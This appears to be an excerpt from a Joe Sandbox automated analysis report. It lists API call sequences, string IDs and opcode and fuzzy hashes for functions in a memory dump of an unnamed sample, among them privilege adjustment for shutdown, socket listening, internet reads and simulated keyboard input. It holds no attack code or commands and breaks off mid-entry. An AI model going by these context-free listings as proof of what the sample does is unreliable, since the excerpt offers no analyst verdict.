                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                  • API String ID: 973565025-2107944366
                                                                                                                  • Opcode ID: 882f580c75ddeef1f3ec418aeaff6363388b959b2c8b4db09fe012e691f4eb4a
                                                                                                                  • Instruction ID: 9136eac49a06630271bbc8fb1fa62d1dc14f2653eef2c3a81bd9aa5f4a4b5624
                                                                                                                  • Opcode Fuzzy Hash: 882f580c75ddeef1f3ec418aeaff6363388b959b2c8b4db09fe012e691f4eb4a
                                                                                                                  • Instruction Fuzzy Hash: 8B517A71204304AFD704EF24DC5AF6A7BE5FB88704F00891DF595AA2E2DB709904CB72
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DABEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DABF0F
                                                                                                                    • Part of subcall function 00DABEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DABF3C
                                                                                                                    • Part of subcall function 00DABEC3: GetLastError.KERNEL32 ref: 00DABF49
                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00DB830C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                  • String ID: $@$SeShutdownPrivilege
                                                                                                                  • API String ID: 2234035333-194228
                                                                                                                  • Opcode ID: 86b72bf9d09dd4c09c328140693629aeb84cb0346f013001caac8f8cdd394e25
                                                                                                                  • Instruction ID: daf1e47ac8dfd64d83022edc35cb58553e064a0bd50f5ee319cb15f4de512b3b
                                                                                                                  • Opcode Fuzzy Hash: 86b72bf9d09dd4c09c328140693629aeb84cb0346f013001caac8f8cdd394e25
                                                                                                                  • Instruction Fuzzy Hash: 7F018F72A40311EAE76826788C4AFFB729DEB01F80F1C4825F943E62D2DE64DC01E1B4
                                                                                                                  APIs
                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00DC9235
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC9244
                                                                                                                  • bind.WS2_32(00000000,?,00000010), ref: 00DC9260
                                                                                                                  • listen.WS2_32(00000000,00000005), ref: 00DC926F
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC9289
                                                                                                                  • closesocket.WS2_32(00000000), ref: 00DC929D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279440585-0
                                                                                                                  • Opcode ID: 9d5638642214694b1932d75aa903c13c72351a127411db2de5c03778275088c8
                                                                                                                  • Instruction ID: c998a5488f4a7130b3d3d49b8560634a1a6e7bbe3826bad3b4930398d2956eb8
                                                                                                                  • Opcode Fuzzy Hash: 9d5638642214694b1932d75aa903c13c72351a127411db2de5c03778275088c8
                                                                                                                  • Instruction Fuzzy Hash: 4C219A35600201AFCB10EF64C899FAEB7AAEF44724F14815DE997AB391DB30AD41CB71
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID: hN$tM
                                                                                                                  • API String ID: 4104443479-658128583
                                                                                                                  • Opcode ID: 5606372822c3724b5b6a86e3d500cf02d28790ec0ba1bb50e036e5c92695c4c9
                                                                                                                  • Instruction ID: 9a09047f18f2d5424e059ca66b587b8c6afd5b853ae3609369b7299bcd4bc120
                                                                                                                  • Opcode Fuzzy Hash: 5606372822c3724b5b6a86e3d500cf02d28790ec0ba1bb50e036e5c92695c4c9
                                                                                                                  • Instruction Fuzzy Hash: 82A22875E00619CBCB24CF58C4806ADBBB1FF48314F2AC19AD959AB391E774DE81DB60
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D9010A: std::exception::exception.LIBCMT ref: 00D9013E
                                                                                                                    • Part of subcall function 00D9010A: __CxxThrowException@8.LIBCMT ref: 00D90153
                                                                                                                  • _memmove.LIBCMT ref: 00DE3020
                                                                                                                  • _memmove.LIBCMT ref: 00DE3135
                                                                                                                  • _memmove.LIBCMT ref: 00DE31DC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1300846289-0
                                                                                                                  • Opcode ID: 7358bbe13e3788fe9fb623a630846ae457e4fc1fa42c333d3cb3e44ca178134e
                                                                                                                  • Instruction ID: 7bab7d6956c0a39541010d427a48c167169874fbe5cfe0b9a403d0fa5ca0a6a2
                                                                                                                  • Opcode Fuzzy Hash: 7358bbe13e3788fe9fb623a630846ae457e4fc1fa42c333d3cb3e44ca178134e
                                                                                                                  • Instruction Fuzzy Hash: 91027F70A00205DFDF04EF69D981AAE7BB5EF48300F54C069E80AEB255EB35DA15CB75
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DCACD3: inet_addr.WS2_32(00000000), ref: 00DCACF5
                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00DC973D
                                                                                                                  • WSAGetLastError.WS2_32(00000000,00000000), ref: 00DC9760
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastinet_addrsocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4170576061-0
                                                                                                                  • Opcode ID: 3b124fb88fe5912e7d8c9e9b58380e2b8940a5c7da7ec0ed540222a52da518ba
                                                                                                                  • Instruction ID: 3c692513c99187af24237959fa4c7cd979af0ce226f6ecabb5a1f751483676c8
                                                                                                                  • Opcode Fuzzy Hash: 3b124fb88fe5912e7d8c9e9b58380e2b8940a5c7da7ec0ed540222a52da518ba
                                                                                                                  • Instruction Fuzzy Hash: 3341A074600200AFDB10AF68C886E7EB7EEEF44724F14805CF956AB392DA749D018BB1
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00DBF37A
                                                                                                                  • _wcscmp.LIBCMT ref: 00DBF3AA
                                                                                                                  • _wcscmp.LIBCMT ref: 00DBF3BF
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00DBF3D0
                                                                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00DBF3FE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2387731787-0
                                                                                                                  • Opcode ID: 131661e752201d415a2e011c67cf5abe26263bb0598d9ae7835f06cf0c92447b
                                                                                                                  • Instruction ID: c1dd300ba3722811138da055e601e9b943508278bbef5242a04762fcf64578c9
                                                                                                                  • Opcode Fuzzy Hash: 131661e752201d415a2e011c67cf5abe26263bb0598d9ae7835f06cf0c92447b
                                                                                                                  • Instruction Fuzzy Hash: 7C418B75604302DFCB08DF28C890AAAB7E5FF49324F14456DE95ACB3A1DB31A941CBA1
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00DB439C
                                                                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00DB43B8
                                                                                                                  • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00DB4425
                                                                                                                  • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00DB4483
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 432972143-0
                                                                                                                  • Opcode ID: 328df464d24fe7bed19708b06d393975b0b1d93fdd71e07519b6b3ba353becfe
                                                                                                                  • Instruction ID: 06e12d80327d7b36641de0fe2b93b9e896ea1195bd1edbecfe3869b529943acd
                                                                                                                  • Opcode Fuzzy Hash: 328df464d24fe7bed19708b06d393975b0b1d93fdd71e07519b6b3ba353becfe
                                                                                                                  • Instruction Fuzzy Hash: 1941F5B0A44248EAEF20CB65D808BFE7BB6AB45311F08415AF583923C2CBB4C995D775
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • GetCursorPos.USER32(?), ref: 00DDEFE2
                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00DEF3C3,?,?,?,?,?), ref: 00DDEFF7
                                                                                                                  • GetCursorPos.USER32(?), ref: 00DDF041
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00DEF3C3,?,?,?), ref: 00DDF077
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1423138444-0
                                                                                                                  • Opcode ID: 5bd20f599ebe95a7c828ab214a3dd134ac5173213bbc2d92b649314f84aa703a
                                                                                                                  • Instruction ID: b7c98797b6acaa00bc444b72c36ff32b3186bbdb4a333815c8d2933422747244
                                                                                                                  • Opcode Fuzzy Hash: 5bd20f599ebe95a7c828ab214a3dd134ac5173213bbc2d92b649314f84aa703a
                                                                                                                  • Instruction Fuzzy Hash: FF21B135500118AFCB258F55C899EFA7FBAEF49754F08406AF9069B3A2C3319D91DBB0
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00DB221E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen
                                                                                                                  • String ID: ($|
                                                                                                                  • API String ID: 1659193697-1631851259
                                                                                                                  • Opcode ID: 39ecd7e0dde0e4a61565df1e2aeb3ae2a4c5fa6ea70aadcd1e3d8b518950f2ee
                                                                                                                  • Instruction ID: 9029d4ed01fe6f822062eae85ae3c2686041e7760682ee41c41f597c61b68532
                                                                                                                  • Opcode Fuzzy Hash: 39ecd7e0dde0e4a61565df1e2aeb3ae2a4c5fa6ea70aadcd1e3d8b518950f2ee
                                                                                                                  • Instruction Fuzzy Hash: 2A320475A00605DFCB28CF69C481AAAB7F1FF48320B15C46EE49ADB7A1D770E941CB64
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00D8AE5E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2065330234-0
                                                                                                                  • Opcode ID: 87f74a7d7e5e8fc518d6a7625221c709be98867656d9d98dec1535d242ade600
                                                                                                                  • Instruction ID: 8755f4f08ea88dfa28b6ed3d02489d64cb7c7ebeca5da205300728fea10a6c18
                                                                                                                  • Opcode Fuzzy Hash: 87f74a7d7e5e8fc518d6a7625221c709be98867656d9d98dec1535d242ade600
                                                                                                                  • Instruction Fuzzy Hash: E8A1F7A0204245BAFB2ABB2E4C89D7F395DDF86741B18492BF582D62A1DA25DC01D373
                                                                                                                  APIs
                                                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00DC4A1E,00000000), ref: 00DC55FD
                                                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00DC5629
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 599397726-0
                                                                                                                  • Opcode ID: ba79e70fcd85cb0981bcfcbd156f5a0ac500d2f1d0b35a00d07fccc22d404ec1
                                                                                                                  • Instruction ID: 0793fbab466731ed76c2a2eacc75432830a31bd15ea7ffd05b655c312b715de3
                                                                                                                  • Opcode Fuzzy Hash: ba79e70fcd85cb0981bcfcbd156f5a0ac500d2f1d0b35a00d07fccc22d404ec1
                                                                                                                  • Instruction Fuzzy Hash: 9841E17161060ABFEB109E90EC85FBFB7BDEB40718F14405EF602A7185DA71AE819B74
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00DBEA95
                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00DBEAEF
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00DBEB3C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1682464887-0
                                                                                                                  • Opcode ID: c74416f980b1e1fb7fd64f00c0f586e61195d2c6f1178ca146efbee43a4e3c1c
                                                                                                                  • Instruction ID: 92e41a8e7d5e20d93494314b11c022b56b89572876672c1df8e33e70fb7d5bf6
                                                                                                                  • Opcode Fuzzy Hash: c74416f980b1e1fb7fd64f00c0f586e61195d2c6f1178ca146efbee43a4e3c1c
                                                                                                                  • Instruction Fuzzy Hash: D4215E75A00208EFCB00EFA5D894AEDBBB9FF48314F148099E806EB351DB31D905CB60
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DB70D8
                                                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00DB7115
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DB711E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 33631002-0
                                                                                                                  • Opcode ID: bc3ff812f64d59952ab0b89a9c933f167c5fd407407daf5c9ae5bab72cffa9da
